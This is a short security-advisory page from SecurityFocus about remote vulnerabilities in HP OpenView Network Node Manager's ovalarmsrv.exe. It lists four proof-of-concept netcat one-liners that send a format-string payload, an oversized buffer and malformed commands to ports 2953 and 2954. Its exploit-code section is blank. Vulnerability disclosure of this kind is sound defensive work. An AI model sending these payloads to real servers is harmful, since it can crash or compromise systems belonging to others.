Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities

The following proofs of concept are available:

echo %n%n%s%n%n%s | nc SERVER 2953 -v -v
echo 62 AAAAAAAAAAAAA...512_'A's...AAAAAAAAAAAAA | nc SERVER 2954 -v -v
echo 47 1 2 what_you_want | nc SERVER 2954 -v -v -w 1
echo 25 0 0 10 boom | nc SERVER 2954 -v -v -w 2

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit code is available:







 

Privacy Statement
Copyright 2008, SecurityFocus